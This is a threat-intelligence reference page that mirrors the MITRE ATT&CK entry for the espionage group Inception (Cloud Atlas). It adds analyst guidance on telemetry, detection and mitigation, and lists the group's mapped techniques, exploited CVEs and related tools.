G0100: Inception
Analyst context for executives and security teams
Inception is an ATT&CK group entry for a cyber espionage actor active since at least 2014, with reporting tied to targeting of government and multiple industries across Russia and other global regions. The defensive value is not the group name alone; it is the pattern of behaviors ATT&CK associates with it: targeted attachment-based entry, client-side exploitation, script-based execution, discovery, credential collection from browsers, persistence through Windows startup mechanisms, and command-and-control that may blend into web traffic or proxy chains.
Executive priority
Treat this as a readiness benchmark for espionage-style intrusions rather than as proof of current exposure. Leaders should ask whether email security, endpoint visibility, identity monitoring, browser credential controls, PowerShell/VBScript governance, and outbound web traffic review are producing usable evidence for investigations. The ATT&CK relationships also support vulnerability-management focus on client application exposure, because exploitation for client execution and malicious files are part of the mapped behavior set.
Technical view
The group object has no ATT&CK-provided detection text and no platform listed on the intrusion-set record, so validation should be driven by the related software and techniques. Related software includes PowerShower, a Windows PowerShell backdoor used for reconnaissance and second-stage payload execution; VBShower, a Windows backdoor/downloader; and LaZagne, a post-exploitation password recovery tool with Windows, Linux, and macOS modules. SOC and IR teams should validate visibility across suspicious Office/document execution chains, PowerShell and Visual Basic activity, mshta.exe and regsvr32.exe proxy execution, Run key or Startup folder persistence, browser credential access, host discovery commands, local file collection, and outbound HTTP/S or web-service-based C2 patterns, including traffic obscured by proxies or encryption.
Likely telemetry
- Email gateway and mailbox telemetry for spearphishing attachments and malicious file delivery
- Endpoint process creation telemetry for PowerShell, Visual Basic-related interpreters, mshta.exe, regsvr32.exe, discovery commands, and downloader behavior
- PowerShell logging where available, including script block, module, and command-line evidence
- Windows registry and startup folder change events for Run key or logon persistence
- File system telemetry for document template references, encoded or encrypted payload files, local data staging, and file/directory enumeration
Detection direction
- Do not rely on a single group signature; build coverage around the mapped behaviors and software relationships.
- Tune detections for suspicious parent-child process chains from email clients, document viewers, archive tools, scripting engines, mshta.exe, and regsvr32.exe.
- Validate PowerShell monitoring for reconnaissance, download, and second-stage execution patterns associated with PowerShower-like behavior, while accounting for legitimate administration noise.
- Monitor VBScript/Visual Basic execution paths and downloader behavior consistent with VBShower-like staging, especially when followed by PowerShell execution.
- Correlate discovery activity, browser credential access, and outbound web traffic rather than treating each signal independently.
Mitigation priorities
- Prioritize patching and exposure reduction for client applications that can be reached through user-opened files or attachments.
- Harden email and attachment handling with detonation, file-type controls, and user-reporting workflows where appropriate.
- Restrict and monitor scripting and living-off-the-land utilities such as PowerShell, mshta.exe, and regsvr32.exe based on business need.
- Reduce stored browser credential risk through credential management policy, browser hardening, and monitoring for credential store access.
- Limit persistence opportunities by monitoring and controlling Run keys, Startup folders, and user-writable autostart locations.
Analyst notes and limits
ATT&CK identifies Inception aliases as Inception, Inception Framework, and Cloud Atlas. The related behavior set emphasizes espionage tradecraft: targeted attachment delivery, client-side execution, script-based backdoors/downloaders, discovery, credential access, local data collection, persistence, and web-based C2. The Unit 42 reference title specifically mentions targeting Europe with a year-old Office vulnerability, supporting vulnerability-management relevance without asserting current exploitation.
The official group object does not provide detection guidance, tactics, or platforms directly. Platform and tactic context in this take comes from the supplied relationships to software and techniques, not from the intrusion-set platform field. Local telemetry, asset mix, email architecture, identity controls, and endpoint logging maturity are required to determine actual coverage or risk.
Inception
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | Inception has encrypted malware payloads dropped on victim machines with AES and RC4 encryption.CitationKaspersky Cloud Atlas December 2014 |
| Enterprise | T1588.002 | Tool Sub-technique | |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Inception has maintained persistence by modifying Registry run key value |
| Enterprise | T1102 | Web Service | Inception has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe.CitationKaspersky Cloud Atlas December 2014CitationSymantec Inception Framework March 2018 |
| Enterprise | T1090.003 | Multi-hop Proxy Sub-technique | Inception used chains of compromised routers to proxy C2 communications between them and cloud service providers.CitationSymantec Inception Framework March 2018 |
| Enterprise | T1518 | Software Discovery | Inception has enumerated installed software on compromised systems.CitationSymantec Inception Framework March 2018 |
| Enterprise | T1083 | File and Directory Discovery | Inception used a file listing plugin to collect information about file and directories both on local and remote drives.CitationSymantec Inception Framework March 2018 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Inception has used weaponized documents attached to spearphishing emails for reconnaissance and initial compromise.CitationKaspersky Cloud Atlas December 2014CitationSymantec Inception Framework March 2018CitationUnit 42 Inception November 2018CitationKaspersky Cloud Atlas August 2019 |
| Enterprise | T1082 | System Information Discovery | Inception has used a reconnaissance module to gather information about the operating system and hardware on the infected host.CitationSymantec Inception Framework March 2018 |
| Enterprise | T1059.001 | PowerShell Sub-technique | Inception has used PowerShell to execute malicious commands and payloads.CitationUnit 42 Inception November 2018CitationKaspersky Cloud Atlas December 2014 |
| Enterprise | T1204.002 | Malicious File Sub-technique | Inception lured victims into clicking malicious files for machine reconnaissance and to execute malware.CitationKaspersky Cloud Atlas December 2014CitationKaspersky Cloud Atlas August 2019CitationSymantec Inception Framework March 2018CitationUnit 42 Inception November 2018 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Inception has used HTTP, HTTPS, and WebDav in network communications.CitationKaspersky Cloud Atlas December 2014CitationUnit 42 Inception November 2018 |
| Enterprise | T1005 | Data from Local System | Inception used a file hunting plugin to collect .txt, .pdf, .xls or .doc files from the infected host.CitationKaspersky Cloud Atlas August 2019 |
| Enterprise | T1218.005 | Mshta Sub-technique | Inception has used malicious HTA files to drop and execute malware.CitationKaspersky Cloud Atlas August 2019 |
| Enterprise | T1555.003 | Credentials from Web Browsers Sub-technique | Inception used a browser plugin to steal passwords and sessions from Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex.CitationSymantec Inception Framework March 2018 |
| Enterprise | T1203 | Exploitation for Client Execution | Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution.CitationKaspersky Cloud Atlas August 2019CitationKaspersky Cloud Atlas December 2014CitationSymantec Inception Framework March 2018CitationUnit 42 Inception November 2018 |
| Enterprise | T1069.002 | Domain Groups Sub-technique | Inception has used specific malware modules to gather domain membership.CitationSymantec Inception Framework March 2018 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | Inception has used VBScript to execute malicious commands and payloads.CitationUnit 42 Inception November 2018CitationKaspersky Cloud Atlas December 2014 |
| Enterprise | T1221 | Template Injection | Inception has used decoy documents to load malicious remote payloads via HTTP.CitationUnit 42 Inception November 2018 |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | Inception has ensured persistence at system boot by setting the value |
| Enterprise | T1573.001 | Symmetric Cryptography Sub-technique | Inception has encrypted network communications with AES.CitationKaspersky Cloud Atlas December 2014 |
| Enterprise | T1057 | Process Discovery | Inception has used a reconnaissance module to identify active processes and other associated loaded modules.CitationSymantec Inception Framework March 2018 |
Groups, software, and campaigns
S0441: PowerShower
PowerShower is a PowerShell backdoor used by Inception for initial reconnaissance and to download and execute second stage payloads.[1][2]
S0442: VBShower
VBShower is a backdoor that has been used by Inception since at least 2019. VBShower has been used as a downloader for second stage payloads, including PowerShower.[1]
S0349: LaZagne
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.2 | Current bundle | 95cfebfb6178… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Unit 42 Inception November 2018
Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020.
Open source URL -
[2]
Symantec Inception Framework March 2018
Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020.
Open source URL -
[3]
Kaspersky Cloud Atlas December 2014
GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020.
Open source URL -
[4]
Cloud Atlas
(Citation: Kaspersky Cloud Atlas December 2014)
-
[5]
Inception
(Citation: Symantec Inception Framework March 2018)
-
[6]
Inception Framework
(Citation: Symantec Inception Framework March 2018)
-
[7]
mitre-attack G0100Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.